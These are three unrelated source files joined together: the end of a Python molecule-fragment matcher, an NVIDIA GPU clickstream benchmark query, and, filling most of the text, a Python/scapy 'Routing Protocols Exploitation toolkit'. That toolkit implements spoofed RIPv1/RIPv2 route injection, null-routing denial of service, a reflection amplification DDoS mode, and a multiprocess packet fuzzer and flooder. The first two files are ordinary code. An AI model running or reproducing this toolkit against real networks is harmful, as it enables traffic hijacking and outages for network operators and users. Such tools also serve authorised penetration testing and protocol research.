if closure_info in currently_visited[key].ring_closures: # matched ring closure, key = atom it should be bonded to
ring_closure_partner = key
if ring_closure_partner in [bond.atom for bond in current_atom.bonded_to]:
ring_closure_bond = None
for bond in current_atom.bonded_to:
if bond.atom == ring_closure_partner:
ring_closure_bond = bond
if ring_closure_bond.bond_code != closure_info[1] and closure_info[1] != 9:
verbose_bin.append("closure bond incorrect")
return False
else:
verbose_bin.append("atom not bonded to correct closure partner")
return False
else:
return True
# first time encountering that ring closure number, don't need to do any further checks
verbose_bin.append("all ring closures acounted for")
return True
def check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, index, branch_atoms):
verbose_bin.append("checking atom")
verbose_bin.append(current_molecule_atom.symbol)
nonlocal currently_visited
current_atom_info = branch_sequence[index]
if current_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != current_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
if current_atom_info.ring_closures:
if not check_ring_closure(current_molecule_atom, current_atom_info):
return False
currently_visited[current_molecule_atom] = current_atom_info
for a in currently_visited:
verbose_bin.append(a.symbol)
if currently_visited[a].ring_closures:
verbose_bin.append(currently_visited[a].ring_closures)
verbose_bin.append("\n")
branch_atoms.add(current_molecule_atom)
if len(current_atom_info.daughter_branches) > 0:
# atom is branch point and need to check branches
return check_branch_point(current_molecule_atom, previous_molecule_atom, current_atom_info, branch_atoms)
else:
# atom is either an endpoint or contiguous segment:
if not current_atom_info.bond:
verbose_bin.append("reached branch end")
# if no bond data, means we have matched the entire branch, return True
return True
else:
# else: this is a contiguous segment look for appropriate bonds
unchecked_bonds = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
if len(unchecked_bonds) == 0:
verbose_bin.append("branch ended too early")
# actual branch has ended, but map says there should be another atom bonded here, therefore return False
return False
elif len(unchecked_bonds) == 1:
# actual molecule only has a contiguous segment here
verbose_bin.append(current_atom_info.bond)
verbose_bin.append(abbr_bond(unchecked_bonds[0]))
if check_bond(unchecked_bonds[0], current_atom_info.bond, branch_sequence[index + 1]) and unchecked_bonds[0].atom not in currently_visited:
return check_atom_bonds(unchecked_bonds[0].atom, current_molecule_atom, branch_sequence, index + 1, branch_atoms) # check next atom
# all branches should either return a function, True, or False. All child functions should do the same
# uncheck_bonds[0].atom becomes new current_molecule_atom, current_molecule_atom becomes previous_molecule_atom
# also pass the branch sequence and the index of the next atom_info in the branch
else:
verbose_bin.append("wrong bond or already visited")
return False
# the next atom in the branch either has the wrong bond or atom symbol
else:
# there are multiple possible paths branch could go
verbose_bin.append("checking multiple paths for branch")
# check all ways
for bond in unchecked_bonds:
if current_atom_info.bond != abbr_bond(bond): # this is purely for seeing what's happening
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
if check_bond(bond, current_atom_info.bond, branch_sequence[index + 1]) and bond.atom not in currently_visited:
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
# looks at all possible ways that match the correct bond
midway_fork = set()
# need to separate the branch_atoms here since we don't know if any of the paths will work
if check_atom_bonds(bond.atom, current_molecule_atom, branch_sequence, index + 1, midway_fork):
branch_atoms.update(midway_fork)
# if one of the paths works, add all the atoms from the midway_fork "branch"
return True
# return True if any of the paths work (also returns first found)
else:
for a in midway_fork:
currently_visited.pop(a)
# if midway_fork doesn't work, need to remove those atoms from currently_visited
return False
# if this else clause didn't return True (i.e. none of the paths succeeded)
# then none of the paths are productive, return false
if check_branch_point(potential_anchor_atom, None, fragment_map, None):
verbose_bin.append("phantom atom check")
for atom in currently_visited:
if not currently_visited[atom].phantom_atom:
# using currently visited to see if the atom_data that was used to find that atom was marked as a phantom_atom
# if it is a phantom atom, don't mark as discovered
atom.discovered = True
else:
verbose_bin.append("this atom should not be counted")
# running checks
verbose_bin.append(f"number of atoms in fragment: {len(molecule_atoms)}")
molecule_atoms2 = [atom.symbol for atom in molecule_atoms]
molecule_atoms2phantom = [atom.phantom_atom for atom in molecule_atoms]
if (len(molecule_atoms)) != len(currently_visited):
verbose_bin.append("error in number of atoms found")
for atom in molecule_atoms:
if atom not in currently_visited:
verbose_bin.append("error: descrepancy between currently_visited and molecule_atoms")
for atom in molecule_atoms:
verbose_bin.append(atom.symbol)
verbose_bin.append("matched fragment to anchor atom")
return Fragment(fragment_name, list(molecule_atoms)) # TODO currently this includes atoms that were found via phantom atoms (unclear if this is wanted behavior)
else:
verbose_bin.append("anchor atom not matched to fragment")
return False
# start from check_branch point on the potential anchor atom
# the anchor atom in map is treated as a branch point, even if it only has 1 branch
fragment_counter = 0
fragments_identified = []
for atom in potential_anchor_atoms:
verbose_bin.append("checking anchor atom")
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
is_found_fragment = check_anchor_atom(atom, anchored_fragment_map)
if is_found_fragment:
# add atoms found to fragment
fragment_counter += 1
fragments_identified.append(is_found_fragment)
verbose_bin.append(f"\nnumber of fragments found: {fragment_counter}")
if verbose:
for item in verbose_bin:
print(item)
return fragments_identified
def fragmentize(molecule_string, *fragment_libraries, numeric=False, verbose=False):
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragments = []
fragment_names = []
fragments_counter = []
generalized_heterocycles_found = []
for lib in fragment_libraries:
if lib != generalized_heterocycles:
for frag in lib:
frag_num = 0
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
frag_num += len(frag_res_found)
# can find multiples of a fragment
for f in frag_res_found:
fragments.append(f)
fragment_names.append(f.name)
fragments_counter.append(frag_num)
# for generalized heterocycles
else:
for frag in lib:
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
for f in frag_res_found:
f.generalize_heterocycle_name()
generalized_heterocycles_found.append(f)
# possible varieties of generalized heterocycles
# name format: X-Y+ZM-het where X is number of heteroatoms, Y is the number of atoms in the ring and
# Z is the number of atoms in the fused ring
generalized_heterocycles_names = ["0-5M-het", "1-5M-het", "2-5M-het", "3-5M-het", "4-5M-het",
"0-6M-het", "1-6M-het", "2-6M-het", "3-6M-het", "4-6M-het",
"0-6+5M-het", "1-6+5M-het", "2-6+5M-het", "3-6+5M-het", "4-6+5M-het", "5-6+5M-het", "6-6+5M-het",
"0-6+6M-het", "1-6+6M-het", "2-6+6M-het", "3-6+6M-het", "4-6+6M-het", "5-6+6M-het", "6-6+6M-het"]
generalized_heterocycles_found_dict = {k:0 for k in generalized_heterocycles_names}
for heterocycle in generalized_heterocycles_found:
generalized_heterocycles_found_dict[heterocycle.name] += 1
fragments.append(heterocycle)
fragment_names.append(heterocycle.name)
for key in generalized_heterocycles_found_dict:
fragments_counter.append(generalized_heterocycles_found_dict[key])
molecule_structure.fragments_list = fragments
atoms_not_discovered = 0
for atom in molecule_structure.atom_list:
if not atom.discovered:
atoms_not_discovered += 1
if atoms_not_discovered > 0:
# total_frags = 0
# for lib in fragment_libraries:
# total_frags += len(lib)
cprint(f"atoms not found: {atoms_not_discovered}", "red")
cprint(molecule_string, 'red')
# return ["NA" for _ in range(total_frags)]
if numeric:
return fragments_counter, molecule_structure
else:
return fragment_names, molecule_structure
|
the-stack_0_12348 | #
# Copyright (c) 2019-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import cudf
from numba import cuda
from bdb_tools.readers import build_reader
q03_days_in_sec_before_purchase = 864000
q03_views_before_purchase = 5
q03_purchased_item_IN = 10001
q03_purchased_item_category_IN = 2, 3
q03_limit = 100
def read_tables(config, c=None):
table_reader = build_reader(
data_format=config["file_format"],
basepath=config["data_dir"],
split_row_groups=config["split_row_groups"],
)
item_cols = ["i_category_id", "i_item_sk"]
wcs_cols = [
"wcs_user_sk",
"wcs_click_time_sk",
"wcs_click_date_sk",
"wcs_item_sk",
"wcs_sales_sk",
]
item_df = table_reader.read("item", relevant_cols=item_cols)
wcs_df = table_reader.read("web_clickstreams", relevant_cols=wcs_cols)
if c:
c.create_table("web_clickstreams", wcs_df, persist=False)
c.create_table("item", item_df, persist=False)
return item_df
@cuda.jit
def find_items_viewed_before_purchase_kernel(
relevant_idx_col, user_col, timestamp_col, item_col, out_col, N
):
"""
Find the past N items viewed after a relevant purchase was made,
as defined by the configuration of this query.
"""
i = cuda.grid(1)
if i < (relevant_idx_col.size): # boundary guard
# every relevant row gets N rows in the output, so we need to map the indexes
# back into their position in the original array
orig_idx = relevant_idx_col[i]
current_user = user_col[orig_idx]
# look at the previous N clicks (assume sorted descending)
rows_to_check = N
remaining_rows = user_col.size - orig_idx
if remaining_rows <= rows_to_check:
rows_to_check = remaining_rows - 1
for k in range(1, rows_to_check + 1):
if current_user != user_col[orig_idx + k]:
out_col[i * N + k - 1] = 0
# only checking relevant purchases via the relevant_idx_col
elif (timestamp_col[orig_idx + k] <= timestamp_col[orig_idx]) & (
timestamp_col[orig_idx + k]
>= (timestamp_col[orig_idx] - q03_days_in_sec_before_purchase)
):
out_col[i * N + k - 1] = item_col[orig_idx + k]
else:
out_col[i * N + k - 1] = 0
def apply_find_items_viewed(df, item_mappings):
# need to sort descending to ensure that the
# next N rows are the previous N clicks
df = df.sort_values(
by=["wcs_user_sk", "tstamp", "wcs_sales_sk", "wcs_item_sk"],
ascending=[False, False, False, False],
)
df.reset_index(drop=True, inplace=True)
df["relevant_flag"] = (df.wcs_sales_sk != 0) & (
df.wcs_item_sk == q03_purchased_item_IN
)
df["relevant_idx_pos"] = df.index.to_series()
df.reset_index(drop=True, inplace=True)
# only allocate output for the relevant rows
sample = df.loc[df.relevant_flag == True]
sample.reset_index(drop=True, inplace=True)
N = q03_views_before_purchase
size = len(sample)
# we know this can be int32, since it's going to contain item_sks
out_arr = cuda.device_array(size * N, dtype=df["wcs_item_sk"].dtype)
find_items_viewed_before_purchase_kernel.forall(size)(
sample["relevant_idx_pos"],
df["wcs_user_sk"],
df["tstamp"],
df["wcs_item_sk"],
out_arr,
N,
)
result = cudf.DataFrame({"prior_item_viewed": out_arr})
del out_arr
del df
del sample
filtered = result.merge(
item_mappings,
how="inner",
left_on=["prior_item_viewed"],
right_on=["i_item_sk"],
)
return filtered
|
the-stack_0_12349 | #!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <[email protected]>
#
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
def processPacket(pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
if not 'attack' in args:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
